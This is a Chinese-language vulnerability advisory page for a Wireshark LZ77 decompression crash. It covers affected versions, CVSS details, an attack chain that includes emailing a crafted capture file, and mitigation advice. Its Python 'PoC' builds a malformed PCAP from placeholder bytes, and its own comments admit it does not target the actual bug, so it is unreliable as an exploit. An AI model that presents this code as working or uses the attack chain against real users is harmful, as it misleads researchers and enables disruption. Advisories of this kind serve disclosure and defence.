CVE-2026-6533 CVSS 5.5 中危

CVE-2026-6533 Wireshark LZ77解压缩崩溃拒绝服务漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6533

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Wireshark

漏洞概述

Wireshark在4.6.0至4.6.4及4.4.0至4.4.14版本中的解包引擎存在LZ77解压缩崩溃漏洞。攻击者可诱导用户打开恶意构造的数据包捕获文件，触发解压缩过程中的异常处理错误，导致应用程序崩溃，从而造成拒绝服务。该漏洞需要本地交互触发，主要影响系统的可用性。

技术细节

该漏洞位于Wireshark的协议解析引擎中，具体涉及LZ77解压缩算法的实现逻辑。LZ77是一种基于字典的无损压缩算法，利用滑动窗口和指针引用来消除数据冗余。在受影响版本中，解析器在处理特定格式的压缩数据时，未能正确校验压缩流中的长度字段或反向指针偏移量，导致在解压过程中访问非法内存地址，触发空指针引用或缓冲区溢出。根据CVSS向量（AV:L/AC:L/PR:N/UI:R/S:U），攻击者需具备本地访问权限并诱导用户交互（例如通过电子邮件诱导用户打开恶意PCAP文件），才能成功触发此漏洞。尽管该漏洞不影响系统的机密性和完整性，但会导致Wireshark进程异常终止，造成拒绝服务，从而中断网络流量分析任务，对依赖该工具的安全运维造成负面影响。

攻击链分析

STEP 1

侦察

攻击者确认目标环境正在使用受影响版本的Wireshark (4.4.0-4.4.14 或 4.6.0-4.6.4)。

STEP 2

武器化

攻击者构造一个特制的网络数据包捕获文件（PCAP），其中包含经过精心设计的恶意LZ77压缩数据流，旨在触发解析器的解压崩溃。

STEP 3

投递

攻击者通过电子邮件、文件共享服务器或社交媒体将恶意PCAP文件发送给目标用户。

STEP 4

利用

目标用户接收到文件后，使用存在漏洞的Wireshark版本打开该文件进行分析。

STEP 5

影响

Wireshark在解析恶意数据包时，Dissection engine触发LZ77解压缩错误，导致程序崩溃，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-6533: Wireshark LZ77 Decompression Crash
# This script generates a malformed PCAP file that may trigger the crash.
# Note: Actual byte patterns to trigger the specific LZ77 bug depend on internal implementation details.

import struct

def create_malformed_pcap(filename):
    # PCAP Global Header
    pcap_global_header = struct.pack('!LHHLLLL', 0xa1b2c3d4, 2, 4, 0, 0, 65535, 1)
    
    # Construct a packet header (dummy values)
    ts_sec, ts_usec = 0, 0
    incl_len, orig_len = 100, 100
    packet_header = struct.pack('!LLLL', ts_sec, ts_usec, incl_len, orig_len)
    
    # Simulate a packet data containing malformed LZ77 compression stream
    # In a real scenario, this data would target a specific dissector using LZ77
    # This is a placeholder to represent the fuzzing input.
    packet_data = b'\x00' * 50  # Ethernet header padding
    # Malicious payload attempting to trigger LZ77 logic error
    malicious_payload = b'\xff' * 50  
    
    with open(filename, 'wb') as f:
        f.write(pcap_global_header)
        f.write(packet_header)
        f.write(packet_data + malicious_payload)

    print(f"[+] Malformed PCAP file generated: {filename}")
    print(f"[+] Open this file in Wireshark 4.4.0 - 4.4.14 or 4.6.0 - 4.6.4 to test.")

if __name__ == "__main__":
    create_malformed_pcap('crash_poc.pcap')

影响范围

Wireshark 4.6.0 to 4.6.4

Wireshark 4.4.0 to 4.4.14

防御指南

临时缓解措施

如果无法立即升级，建议用户不要打开来源不明的网络捕获文件。管理员应限制对Wireshark的访问权限，仅允许授权人员在受控环境中使用该工具进行数据分析。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表